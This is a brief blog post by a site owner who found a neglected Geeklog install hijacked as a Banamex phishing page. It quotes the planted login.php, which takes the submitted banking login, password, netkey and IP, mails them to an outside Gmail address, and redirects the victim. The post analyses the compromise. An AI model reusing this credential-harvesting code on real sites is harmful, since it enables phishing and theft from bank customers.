« Be not anxious! | Main | Resolving the missing Ad Management link (SMF 1.1.3) »

"Bana" banamex scam

I recently went in and triaged a Geeklog install I haven't touched in a few months. Lo and behold, it had been hijacked by scammer spammers. Here is login.php:

$message .= "Login: ".$_POST['ncliente'];
$message .= "Password: ".$_POST['pass'];
$message .= "Netkey: ".$_POST['netkey'];
$message .= $ip = getenv("REMOTE_ADDR");

//sending email info here

$subj = "Bancanet - Banamex";
$from = "From: Info";
mail("devilzx0@gmail.com", $subj, $message, $from);
header("Location: verificacion.htm");

My ISP was complaining of mail sent. This was probably it. There are a lot of references in the index.htm and verificacion.html to banamex.com. Check out this particular segment of verficacion.htm:


How and where is the money made here? Harvesting accidental logins... There is one redirection to "istemp.com":


Anyone know anything about this?

Update: Here's the phishing alert. It's from 2005.

Post a comment

Please enter the security code you see here